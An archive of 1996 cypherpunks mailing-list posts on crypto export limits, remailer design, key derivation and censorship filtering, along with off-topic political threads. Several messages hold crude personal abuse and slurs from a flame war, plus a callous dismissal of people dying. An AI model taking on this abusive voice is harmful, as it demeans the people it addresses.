>> ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
>> ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
>> ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
>> ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
>> ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
>> ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
>> ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
>> ]mUqFH41Z7NkyO8ZFdi5GGX0=
>> ]=CMZA
>> ]- -----END PGP PUBLIC KEY BLOCK-----
>> ]
>> ]
>> ]
>> ]-----BEGIN PGP SIGNATURE-----
>> ]Version: 2.6.3ia
>> ]Charset: cp850
>> ]
>> ]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR
>> ]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B
>> ]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh
>> ]2Wqa5+h8R7g=
>> ]=/M2U
>> ]-----END PGP SIGNATURE-----
>> ]
>> ]  Datacomms Technologies web authoring and data security
>> ]       Paul Bradley, Paul@fatmans.demon.co.uk
>> ]  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org
>> ]       Http://www.cryptography.home.ml.org/
>> ]      Email for PGP public key, ID: 5BBFAEB1
>> ]     "Don`t forget to mount a scratch monkey"
>>
>Fuckhead.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 30 Sep 1996 14:56:08 +0800
To: Erp <erp@digiforest.com>
Subject: Re: Cryptography..
Message-ID: <199609300453.VAA09353@netcomsv.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:03 AM 9/29/96 -0700, Erp <erp@digiforest.com> wrote:
>What is the maximum encryption allowed to be created.  With export 
>restrictions in mind, and without export restrictiosn in mind...
>Thanks...   By WORLD and US standards please...

The laws of nature don't appear to provide any maximum strength,
assuming you run out of atoms to store your data before
you run out of capacity for your computer, and _you'll_ be out of
cash long before that :-)  For mathematically strong algorithms,
you can make the work a cracker has to do be exponentially larger
than the amount of work you have to do to decrypt, so you win.

Different governments have different rules, and many have no rules. 
Bert-Jaap Koops has a summary that (last time I looked) was at
http://cwis.kub.nl/~frw/CRI/projects/bjk/lawsurvy.htm
about different governments' crypto use and export rules.

For the US, you can export cryptography software if you get permission,
and you can usually get permission if you're using up to
40-bit symmetric-key keys and 512-bit public keys,
or if you're writing software that's strictly for banking.
You usually can't get permission for stronger crypto than that,
unless you're a registered international arms dealer and are
only selling your crypto gear to Friends Of The Pentagon.
There aren't any restrictions on the strength of crypto you can
use for messages you're exporting, only on software you export.
And there are somewhat bizarre interpretations of "export",
including telling foreigners inside US borders if they're not US subjects.

Domestically, there are no restrictions on crypto you can
write and use inside the US, subject of course to the bizarre interpretations
of "domestically" that accompany "export".

 

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Mon, 30 Sep 1996 17:34:41 +0800
To: "Geoffrey C. Grabow" <gcg@pb.net>
Subject: Re: What about making re-mailers automatically chain?
Message-ID: <3.0b19.32.19960929222542.006b0ed0@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


>Would it be a good idea to have a re-mailer "randomly" decide whether to
>send the mail to the destination or to another re-mailer.

No. The remailer user should be presumed to know what s/he wants. Some
remailer users may want to optimize for speed and certainty of delivery and
therefore use a short chain; other users may want to optimize for more
difficult traceability, and consequently choose a long chain. Remailers
shouldn't try to rewrite the user's (perhaps) deliberate balancing of these
factors.

Also, users may choose to use or not use certain remailers based upon their
policies, the reputation of the operators, the legal rules affecting the
operators, and so forth. These choices should also be left to the user and
not overridden by third parties. 

> If all
>re-mailers performed this way, not even the sender would know the path.

I don't see why this is useful. As things work now, only the sender knows
the path, assuming chaining and nesting encryption. How does taking away
the sender's knowledge add security?
 
Adding hops to the chain requires that remailers keep track of other
remailers; a robust way of doing this would require that they also keep
track of reliability, because deciding to add a downed (or unreliable)
remailer to a chain would be harmful. To prevent an active and hostile
eavesdropper from adding itself as a remailer eligible to receive extra
hops (and then dropping or logging the traffic), this remailer status
information should be provided by a trusted source in a secure manner.

All of this (adding remailer status tracking based on frequent updates of
digitally signed information from a trusted third party) can be done, but
it's a pain in the ass to code, and it doesn't add anything that users
can't get for themselves. (Users who want long difficult-to-trace chains
can already generate them. They can also let software generate random
chains at the source.) It also may degrade performance for users who value
speed and reliability over untraceability.

So I suggest that it's not very useful. The best way to implement this
would be to modify remailers to use "Anon-To: random" or "Random-To:
xxx@yyy.zzz" header commands, such that users who desired the random hop
behavior could get it, but users who didn't want it wouldn't get it
unexpectedly. (Isn't some remailer doing this already? I've lost track.) 

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Mon, 30 Sep 1996 13:54:10 +0800
To: nobody@cypherpunks.ca (John Anonymous MacDonald)
Subject: Re: Does any body know anything about this?
In-Reply-To: <199609292138.OAA27616@abraham.cs.berkeley.edu>
Message-ID: <199609300328.WAA21279@bermuda.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Is this just more snakeoil or is this real?

[Deleted -- Matt Blaze's seminar]

Matt Blaze isn't a snake oil type.  He from what I have seen is one of the
"good guys".

I think, he is the maker of S/KEY, IIRC.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hendrik Reh <hereh@stud.uni-sb.de>
Date: Mon, 30 Sep 1996 16:34:54 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Looking for Codebreaker's by David Kahn
Message-ID: <324EF031.187D@stud.uni-sb.de>
MIME-Version: 1.0
Content-Type: text/plain


Im looking for Codebreakers by David Kahn !!
Can anybody give me a hint where i can get this book
thanx

-- 

      ,,,,              Gruss,
      /'^'\                    Hendrik
     ( o o )
-oOOO--(_)--OOOo------------------------------------------------
                 Hendrik Reh, Tel. : +49 0681 48362
  .oooO            WWW: http://fsinfo.cs.uni-sb.de/~garetjax/
  (   )   Oooo.      eMail: hereh@stud.uni-sb.de
---\ (----(   )-------------------------------------------------
    \_)    ) /  
          (_/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 30 Sep 1996 17:31:51 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Workers, Public Schools, Tradesmen, and Justice
In-Reply-To: <199609290126.UAA00307@smoke.suba.com>
Message-ID: <324F65DC.21FF@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


snow wrote:
> Mr. May said:
> > At 1:35 PM -0500 9/27/96, jbugden@smtplink.alis.ca wrote:
> > >If you want to refuse those who are too stupid or anti-social from 
> > >Public Schools in order to improve the social or intellectual
> > >climate, you better have a solution for the resulting cast-offs.

[text deleted: trade schools, welfare system, etc.]

> People die for all manner of reasons every day. Fuck'em.
> Petro, Christopher C.
> petro@suba.com <prefered for any non-list stuff>
> snow@smoke.suba.com

Seems to me they had excellent solutions in the 1930's. Bread lines for 
those who needed food and couldn't find work. Labor camps for those who 
wanted to work anyway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 30 Sep 1996 17:43:37 +0800
To: attila <attila@primenet.com>
Subject: Re: active practice in America
In-Reply-To: <199609290438.WAA23813@infowest.com>
Message-ID: <324F6997.4856@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


attila wrote:
> In <199609290133.UAA00319@smoke.suba.com>, on 09/28/96
>    at 08:33 PM, snow <snow@smoke.suba.com> said:
> > A Person going by the name Attila said:
> > to put it another way: in criminal procedings: I would rather
> > be considered guilty, until proven innocent; than I would be
> > presumed innocent, until proven guilty beyond a reasonable doubt.

> =If you were the person being _tried_ for a crime, you would rather
> =have to prove that you COULDN'T POSSIBLY have commited the crime as
> =opposed to having to have the government PROVE that you DID DO it?

>         you bet --the objective of the defense is to cast aspersions
>     on the government prosecuters --in other words, create that
>     doubt.  you do not need to prove your innocence unconditionally,
>     just "taint" the prosecuter a bit.  however, in many cases you are
>     guaranteed a trial by a jury of your peers.
>         as for peers --look at OJ, and the reverse weighting of the
>     Santa Monica jury v. downtown.

Speaking of peers, what would the founding fathers have said about the 
trial of the officers in the Rodney King case?  Would they, as police 
officers, have a right to a jury of their peers?  Would their peers be 
the people in Simi Valley, where many or most of them live?  Or would it 
be more appropriate to have a jury of the victims' peers?  Or both?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Mon, 30 Sep 1996 13:32:38 +0800
To: cypherpunks@toad.com
Subject: The ever-vigilant John Anon
Message-ID: <Pine.OSF.3.91.960929225154.29613A-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain



>Date: Sun, 29 Sep 1996 14:38:01 -0700
>From: John Anonymous MacDonald <nobody@cypherpunks.ca>
>To: cypherpunks@toad.com
>Subject: Does any body know anything about this?
>
>Is this just more snakeoil or is this real?

This is quite real, and was posted on the CCC list a while ago.  It turns
out the Isaac Newton Institute for Mathematical Sciences (Cambridge, UK)
has been having a regular series of seminars on crypto and papers from a
distinguished group of presenters.  Several of the agenda notices, etc.,
have been posted here from time to time, hidden in the usual spew.

Look for the proceedings to be published by Springer Verlag.

Do a web search on 'Information Hiding' or 'Turbo Codes' or just go look 
at:  http://www.cl.cam.ac.uk/users/rja14/ihws.html

Snake oil, indeed.  

>
><<<<<<<< FORWARDED MESSAGE >>>>>>>>
>From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
>Date: Fri, 20 Sep 1996 09:05:28 +0100
>Subject: Seminar in Cryptology and Computer Security
>
>                         ***   ***   ***   ***   ***





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 30 Sep 1996 17:19:59 +0800
To: Erp <erp@digiforest.com>
Subject: Re: Cryptography..
In-Reply-To: <Pine.LNX.3.91.960929030258.13020B-100000@digital.digiforest.com>
Message-ID: <324F6D8E.370B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Erp wrote:
> What is the maximum encryption allowed to be created.  With export
> restrictions in mind, and without export restrictiosn in mind...
> Thanks...
> By WORLD and US standards please...
> much appreciated..
> export from the US to elsewhere that is also..
> reply asap is much appreciated

Well, if you do the wrong thing, better encrypt it so nobody knows....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 30 Sep 1996 14:09:14 +0800
To: cypherpunks@toad.com
Subject: [SPAM] Continuing "fuckhead" fan mail from Timmy "peteur" May
In-Reply-To: <199609300332.AA09870@crl12.crl.com>
Message-ID: <LJV2uD91w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May has no life.

>From: Troy Varange <varange@crl.com>
>Message-Id: <199609300332.AA09870@crl12.crl.com>
>Subject: Re: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May
>To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>Date: Sun, 29 Sep 1996 20:32:58 -0700 (PDT)
>In-Reply-To: <ueP2uD86w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 09:45:41 pm
>X-Mailer: ELM [version 2.4 PL23]
>Mime-Version: 1.0
>Content-Type: text/plain; charset=US-ASCII
>Content-Transfer-Encoding: 7bit
>Content-Length: 4378
>
>>                    berserk
>> Timmy May has gone        . Has he been eating speed?
>>                    bananas
>>
>> >From: Troy Varange <varange@crl.com>
>> >Message-Id: <199609300138.AA08482@crl12.crl.com>
>> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May
>> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT)
>> >In-Reply-To: <FFi2uD82w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm
>> >X-Mailer: ELM [version 2.4 PL23]
>> >Mime-Version: 1.0
>> >Content-Type: text/plain; charset=US-ASCII
>> >Content-Transfer-Encoding: 7bit
>> >Content-Length: 3442
>> >
>> >>
>> >> What has Timmy been smoking?
>> >>
>> >> ]From paul@fatmans.demon.co.uk  Sun Sep 29 19:03:40 1996
>> >> ]Received: by bwalk.dm.com (1.65/waf)
>> >> ]	via UUCP; Sun, 29 Sep 96 19:14:06 EDT
>> >> ]	for dlv
>> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
>> >> ]        id AA25790 for dlv@bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400
>> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ac16129;
>> >> ]          29 Sep 96 15:59 BST
>> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
>> >> ]           id aa09441; 29 Sep 96 15:54 BST
>> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
>> >> ]	id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000
>> >> ]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
>> >> ]From: paul@fatmans.demon.co.uk
>> >> ]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
>> >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000
>> >> ]Mime-Version: 1.0
>> >> ]Content-Type: text/plain; charset=US-ASCII
>> >> ]Content-Transfer-Encoding: 7BIT
>> >> ]Subject: Re: Possible subs attack????
>> >> ]Priority: normal
>> >> ]X-Pm-Encryptor: JN-PGP-P, 4
>> >> ]X-Mailer: Pegasus Mail for Windows (v2.31)
>> >> ]Message-Id: <844008901.9441.0@fatmans.demon.co.uk>
>> >> ]
>> >> ]-----BEGIN PGP SIGNED MESSAGE-----
>> >> ]
>> >> ]
>> >> ]> The lying sack of shit Timmy May <paul@fatmans.demon.co.uk> writes:
>> >> ]
>> >> ]> The lying sack of shit Timmy May lies again, as usual.
>> >> ]
>> >> ]Fuck you,
>> >> ]
>> >> ]I am not Tim May, Check out the return path if you don`t believe me,
>> >> ]if you still don`t here`s my PGP public key signed by the EFF, they
>> >> ]don`t sign keys here and there without checking ID`s...
>> >> ]
>> >> ]Type Bits/KeyID    Date       User ID
>> >> ]pub  1024/5BBFAEB1 1996/07/30 Paul Bradley <paul@fatmans.demon.co.uk>
>> >> ]
>> >> ]- -----BEGIN PGP PUBLIC KEY BLOCK-----
>> >> ]Version: 2.6.3ia
>> >> ]
>> >> ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
>> >> ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
>> >> ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
>> >> ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
>> >> ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
>> >> ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
>> >> ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
>> >> ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
>> >> ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
>> >> ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
>> >> ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
>> >> ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
>> >> ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
>> >> ]mUqFH41Z7NkyO8ZFdi5GGX0=
>> >> ]=CMZA
>> >> ]- -----END PGP PUBLIC KEY BLOCK-----
>> >> ]
>> >> ]
>> >> ]
>> >> ]-----BEGIN PGP SIGNATURE-----
>> >> ]Version: 2.6.3ia
>> >> ]Charset: cp850
>> >> ]
>> >> ]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR
>> >> ]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B
>> >> ]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh
>> >> ]2Wqa5+h8R7g=
>> >> ]=/M2U
>> >> ]-----END PGP SIGNATURE-----
>> >> ]
>> >> ]  Datacomms Technologies web authoring and data security
>> >> ]       Paul Bradley, Paul@fatmans.demon.co.uk
>> >> ]  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org
>> >> ]       Http://www.cryptography.home.ml.org/
>> >> ]      Email for PGP public key, ID: 5BBFAEB1
>> >> ]     "Don`t forget to mount a scratch monkey"
>> >>
>> >Fuckhead.
>>
>Fuckhead.  We know your behind Vulis, Cock-sucker




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Sun, 29 Sep 1996 21:57:39 +0800
To: cypherpunks@toad.com
Subject: Re: Transforming variable-length to fixed keys
Message-ID: <84399947820692@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


>If the speed of your key generation is an issue, you could do something like:
>
>   key[] = { 0 };
>   const int nhashes = 4;
>   typedef void (*hashfnptr)(byte*, byte*, int);
>        /* array of hash functions */
>   hashfnptr hash[ nhashes ] = { md5, sha1, haval, ... };
>
>   state = hash[ 0 ]( algorithm, mode, parameters, userKey );
>
>   for count = 1 to iterations
>      for length = 1 to keyLength (in hash_output_size blocks)
>                /* selecting a hash function based on the state */
>         state = hash[ state % nhashes ]( state );
>         key[ length ] = hash[ state % nhashes]( state, userKey );
>
>This provides more expense in hardware for the same expense in software, so
>for the same CPU time you get more hardware expense, and could reduce the
>iterations for the same security.
>
>`nhashes' determined by the number of digest algorithms you consider
>trustworthy.
>
>(They need hardware for `nhashes' different digest algorithms).
>
>You need to do something about resolving the differing output and state sizes.
 
Yeah, that's a particularly evil way of making things harder for people with
keysearch engines.  That's why in cryptlib when I'm doing something like key
exchange I encrypt all the parameters (algorithm, mode, etc etc) along with the
session key, so an attacker can't even tell what algorithm you're using[1]. I'd
thought of adding some sort of "choose a random algorithm and mode" capability
to cryptlib, but the user interface was too difficult to handle (finding a way
to let the user specify "We want a choice of DES-CFB, IDEA-OFB, DES-EDE-CBC, or
Blowfish-PCBC" is a bit of a pain).  In the end I took the easy way out by
adding an extended initialisation mode which allows the user to specify the
algorithm if they want, but left the possibility of one-algorithm-per-round
hashing alone.  A problem with using one of a fixed selection of algorithms is
that as you add new modes the selection changes, so you need to add more state
information to the key which specifies the choice of algorithms, which starts
to get messy.
 
I'd still love to add this in some form to keep the NSA amused... perhaps a
bit vector of allowable algorithms and modes passed to the setup function.

Peter.

[1] There's a story from IBM when they were testing a new IBM-internal 
    encryption system for long-haul telecoms applications.  They were 
    playing around with bouncing encrypted transmissions off an IBM-owned 
    satellite when they were contacted by the NSA who said "You're not using 
    DES.  Stop it".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Mon, 30 Sep 1996 17:57:15 +0800
To: cypherpunks@toad.com
Subject: Re: Tools for Rendering Censorship Firewalls Ineffective
In-Reply-To: <199609300259.TAA04617@dfw-ix8.ix.netcom.com>
Message-ID: <199609300727.AAA05186@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> The obvious techniques I can see include
> 1) Filter on IP address (e.g. German attack on XS4ALL)
> 2) Filter on DNS Name
> 3) Filter on Patterns in URL
> 4) Filter on Patterns in PUT/GET Requests
> 5) Filter on Patterns in Response.
> 6) Traffic Analysis on reading patterns

7) Punish all those accessing forbidden web sites with caning or
   forced labor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 30 Sep 1996 17:50:43 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Making Remailers Widespread [REMAILERS]
Message-ID: <199609300728.AAA17384@netcomsv.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:37 AM 9/29/96 EDT, you wrote:
>How about: maintain a list of trusted blocking-list sites (comparable to the
>list of remailers used for chaining) and when it comes the time to update the
>local copy of the blocking list, ask a random one on the list; if it's down,
>ask another random one on the list. There may even be more than one list. :-)

Getting more complex, but it might be workable.


>> sender-blocking list 
...
>With most ISP's it's trivial to forge one's From: header in SMTP.
>Switching to another dime-a-dozen throwaway account is also trivial.
>Just admit that you can't block senders, and don't pretend that you
>can - false pretenses destroy one's credibility.

You obviously can't source-block a determined spammer, but you can
slow down some spam attacks, especially if they're one individual 
using his/her regular account.  It's no panacaea, but it helps.
Also, if you source-block based on patterns anywhere in the header,
you can catch less capable email forgers.


>I think I see a way to accomplish this without too much trouble.
>When an e-mail is directed at u@c4.c3.c2...c1, the code that checks
>for blocking will search for the following records in the blocking list:
>u@c4.c3.c2...c1     (exact match)
>*@c4.c3.c2...c1     (replace user by *)
>u@*.c3.c2...c1      (replace leftmost .-separated piece of domain by *)
>*@*.c3.c2...c1      (both)
>and repeat until there are only 2 components left in the domain name.

That'd work.  It's clunky, but there's no avoiding clunkiness
for this sort of thing, and it does preserve privacy.

>Now, the question is, who would be allowed to add records containing
>'*' to the blocking list using the cookie protocol? I suggest that it be
>one of the contacts listed in Internic's database.

postmaster@domain is (ostensibly) guaranteed to exist.
The Internic database is an interesting alternative, but for this
I suspect postmaster is good enough.  There's also the problem
that for many domains, where smallcompany.com is virtual on an ISP,
the Internic database will generally list someone at the ISP,
who probably has no interest in the issue, rather than someone
responsible for making decisions about smallcompany.com

>Thus a blocking record for cypherpunks@toad.com could be added by
>anyone listed in toad.com's Internic entry.  There's no need for any
>Remailer Cabal [tinc] to maintain blocking lists.

For destination blocking, I agree that users should be able to 
block their own stuff as automagically as possible.
For source blocking, most of the need is for spams and abusers
that have been tracked down (or identify themselves in their postings),
and that takes human thought.  In particular, spammers are unlikely
to block themselves from the remailers (:-), but forgers may try to block
legitimate users.

>One other suggestion: instead of storing one bit of information (the
>address is on the list or not), why not have several flag bits.
>E.g., the blocking list could contain records similar to:
>hash - e.g. 160-bit SHA
>flags - e.g. reserve 32 bits

Interesting.  I suspect the state of the art would be to collect
the bits with a disclaimer that there isn't any code to interpret them :-),
but it does let you build a blocking database that's usable as capabilities
grow.
Any suggestions for flags besides block/allow one-way, block/allow two-way,
and max-size?  I'm thinking of doing a remailer that instead of sending
you a message, it sends you a retrieval cookie and lets you send it back
to collect the message; blocking that would be another flag.

The other kind of blocking that needs adding is blocking by
words in message bodies - the spammer that caused me to shut down
my remailer and not bring it back up was posting hate messages
with somebody else's name and email signed at the bottom.  
It only took one or two to generate a flood of flames to the victim,
and my current remailer couldn't block any followups.
Also, since the spammer wasn't generating the flames himself,
his spam slipped under the remailer's spam counter, just as
hipcrime's did.  This sort of blocking also lets you block
things like the hipcrime spam and MAKE MONEY FAST.
But it's a much more sensitive problem - anybody who can add things
to the body-checking list can start doing real censorship,
and it's probably best to leave that to individual operators to block,
or at least to turn on by hand rather than default.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 30 Sep 1996 14:26:37 +0800
To: "Douglas R. Floyd" <dfloyd@io.com>
Subject: Re: Does any body know anything about this?
In-Reply-To: <199609300328.WAA21279@bermuda.io.com>
Message-ID: <199609300431.AAA12492@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Douglas R. Floyd" writes:
> Matt Blaze isn't a snake oil type.  He from what I have seen is one of the
> "good guys".

True.

> I think, he is the maker of S/KEY, IIRC.

False. He's done many cool things, but not S/KEY.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Mon, 30 Sep 1996 15:03:14 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Utah as a Religious Police State
In-Reply-To: <v03007802ae74939813f4@[207.167.93.63]>
Message-ID: <Pine.LNX.3.95.960930005217.19145A-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


      I never cease to be surprised by the interest that gentiles show  in
working mormon communities while totally neglecting their own failing
areas.

On Sun, 29 Sep 1996, Timothy C. May wrote:

> 
> (I received this message, with "cypherpunks@sybase.com" as well as
> "tcmay@sybase.com" (???) cc:ed, so I assume this message was intended for
> the Cypherpunks list, with some sybase domain name weirdness, or reflector,
> going on.)
> 
> At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote:
> >I guess that depends on your definition of liberty.  The Mormons
> >originally moved there to have a place to practice their religion,
> >and have freedom from persecution.  I suppose one could extend that
> >to wanting a place to have the freedom to have a set of rules consistant
> >with their beliefs.  Should that include freedom from interferance from
> >folks such as yourself who want to change their rules, even though
> >you're not presently effected?
> 
> Well, if Utah can rig a way to _secede_ from the Union, your arguments
> would make more sense. But so long as they are part of these United States,
> their religious beliefs about when children should be at home cannot
> supersede basic liberties.
> 
> (There are some thorny issues about whether _minors_ have full civil
> rights. But I certainly know that _my_ civil rights are being affected when
> my children are not allowed on the streets after some hour. If my child is
> out, this is my problem. I neither want cops to stop-and-detain my
> children, nor do I want my tax monies to be used to control the behavior of
> other people's children. Providing no crimes are being committed, curfews
> for the sake of controlling the behavior of children are no more just than
> would be a bunch of related behavior control laws, e.g., a ban on comic
> books, a mandate that all children join after-school youth leagues, etc.)
> 
> As for "changing their rules," you're missing the point. There are
> presumably many in Utah who believe as I do (maybe even some Mormons).
> Those who are living in Utah, as renters, owners, whatever, should not be
> bound by unconstitutional rules, no matter how many Mormon Elders favor
> them. Unless the Mormons own _all_ of the property (and maybe not even
> then, as renters have civil rights), they cannot impose their own notions
> of morality on the rest of the population, except in compelling cases
> (e.g., involving the well-known actual _crimes_).
> 
> I don't mean to pick on Mormons, as other communities have also attempted
> to impose curfews and other restricitions on the children of others. My ire
> was raised by Attila's enthusiastic support for laws which no
> freedom-loving person should be enthusiastic about. Again, I have no
> problem with Attila restricting his own children's movements, or joining
> with other parents to control the behavior of their _own_ children, via
> religious camps, religious schools, youth leagues, etc. He can even make
> his own kids wear funny uniforms, funny religious hats, whatever.
> 
> But, for example, tellling _me_ when _my_ children may be out on public
> streets (doing nothing illegal, neither robbing nor spray-painting nor
> committing any other real crimes) is unacceptable.
> 
> I urge Attila (and others) to rethink enthusiastic support for curfews.
> 
> --Tim May
> 
> 
> 
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 1 Oct 1996 09:58:45 +0800
To: cypherpunks@toad.com
Subject: the theory of split currency
Message-ID: <199609302118.OAA11208@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Fred Foldvary <ffoldvar@jfku.jfku.edu> wrote:
> Is there a name for a dual or split currency, in which
> there is one currency for domestic use and another, different
> appearing, currency for foreign usage?
>
> Does anyone know of any country which has had such a
> split currency?

Many third world nations employed this system, one currency 
for internal use only, and one currency for international 
transactions.  The international currency was sometimes 
denominated in hard currency, and reasonably convertible into it.

